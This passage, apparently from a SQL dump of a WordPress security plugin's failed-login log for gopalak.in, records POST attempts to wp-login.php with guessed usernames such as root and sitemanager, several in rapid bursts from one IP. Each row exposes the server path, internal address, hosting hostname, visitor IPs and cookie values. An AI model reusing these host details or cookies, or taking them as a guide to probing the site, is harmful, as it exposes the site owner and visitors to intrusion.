Edg/115.0.1901.203\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"35452\";s:11:\"REMOTE_ADDR\";s:11:\"123.1.133.4\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746073271.1512151;s:12:\"REQUEST_TIME\";i:1746073271;}}','123.1.133.4',0,'2025-05-01 09:51:12','1970-01-01 00:00:00'),(94783,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, deflate, br\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"106\";s:15:\"HTTP_USER_AGENT\";s:128:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 13_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"35616\";s:11:\"REMOTE_ADDR\";s:15:\"199.188.201.153\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"106\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746073611.3122339;s:12:\"REQUEST_TIME\";i:1746073611;}}','199.188.201.153',0,'2025-05-01 09:56:53','1970-01-01 00:00:00'),(94784,0,'a:2:{s:8:\"username\";s:4:\"root\";s:6:\"server\";a:41:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:27:\"/wp-login.php?wp_lang=en_US\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:84:\"_jwp=1; swpm_session=d2fb05b20e7811d318ca85703fadf188; _uid=rB8jg2gTJ/55RU7pAwvoAg==\";s:19:\"HTTP_SEC_FETCH_USER\";s:2:\"?1\";s:19:\"HTTP_SEC_FETCH_DEST\";s:8:\"document\";s:19:\"HTTP_SEC_FETCH_MODE\";s:8:\"navigate\";s:19:\"HTTP_SEC_FETCH_SITE\";s:11:\"same-origin\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.9\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\";s:12:\"HTTP_REFERER\";s:30:\"http://gopalak.in/wp-login.php\";s:15:\"HTTP_USER_AGENT\";s:111:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"57\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_ENCODING\";s:12:\"gzip,deflate\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"63246\";s:11:\"REMOTE_ADDR\";s:13:\"193.176.22.29\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"57\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:13:\"wp_lang=en_US\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746085889.5475969;s:12:\"REQUEST_TIME\";i:1746085889;}}','193.176.22.29',0,'2025-05-01 13:21:31','1970-01-01 00:00:00'),(94785,2,'a:2:{s:8:\"username\";s:5:\"Alpha\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"114\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"52999\";s:11:\"REMOTE_ADDR\";s:15:\"196.251.112.104\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"114\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746137521.834517;s:12:\"REQUEST_TIME\";i:1746137521;}}','196.251.112.104',1,'2025-05-02 03:42:03','2025-05-03 04:24:38'),(94786,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"120\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"53000\";s:11:\"REMOTE_ADDR\";s:15:\"196.251.112.104\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"120\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746137521.835362;s:12:\"REQUEST_TIME\";i:1746137521;}}','196.251.112.104',1,'2025-05-02 03:42:03','2025-05-03 04:24:38'),(94787,5,'a:2:{s:8:\"username\";s:7:\"mercury\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"116\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"53004\";s:11:\"REMOTE_ADDR\";s:15:\"196.251.112.104\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"116\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746137521.9045861;s:12:\"REQUEST_TIME\";i:1746137521;}}','196.251.112.104',1,'2025-05-02 03:42:03','2025-05-03 04:24:38'),(94788,4,'a:2:{s:8:\"username\";s:5:\"gamma\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"114\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"53003\";s:11:\"REMOTE_ADDR\";s:15:\"196.251.112.104\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"114\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746137521.896472;s:12:\"REQUEST_TIME\";i:1746137521;}}','196.251.112.104',1,'2025-05-02 03:42:03','2025-05-03 04:24:38'),(94789,3,'a:2:{s:8:\"username\";s:4:\"beta\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"113\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"53002\";s:11:\"REMOTE_ADDR\";s:15:\"196.251.112.104\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"113\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746137521.8477139;s:12:\"REQUEST_TIME\";i:1746137521;}}','196.251.112.104',1,'2025-05-02 03:42:04','2025-05-03 04:24:38'),(94790,3,'a:2:{s:8:\"username\";s:4:\"beta\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"117\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"52921\";s:11:\"REMOTE_ADDR\";s:15:\"196.251.112.104\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"117\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746137706.643719;s:12:\"REQUEST_TIME\";i:1746137706;}}','196.251.112.104',1,'2025-05-02 03:45:08','2025-05-03 04:24:38'),(94791,5,'a:2:{s:8:\"username\";s:7:\"mercury\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"120\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"52923\";s:11:\"REMOTE_ADDR\";s:15:\"196.251.112.104\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"120\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746137706.6367071;s:12:\"REQUEST_TIME\";i:1746137706;}}','196.251.112.104',1,'2025-05-02 03:45:08','2025-05-03 04:24:38'),(94792,2,'a:2:{s:8:\"username\";s:5:\"Alpha\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"118\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"52920\";s:11:\"REMOTE_ADDR\";s:15:\"196.251.112.104\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"118\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746137706.6375;s:12:\"REQUEST_TIME\";i:1746137706;}}','196.251.112.104',1,'2025-05-02 03:45:08','2025-05-03 04:24:38'),(94793,4,'a:2:{s:8:\"username\";s:5:\"gamma\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"118\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"52922\";s:11:\"REMOTE_ADDR\";s:15:\"196.251.112.104\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"118\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746137706.638519;s:12:\"REQUEST_TIME\";i:1746137706;}}','196.251.112.104',1,'2025-05-02 03:45:08','2025-05-03 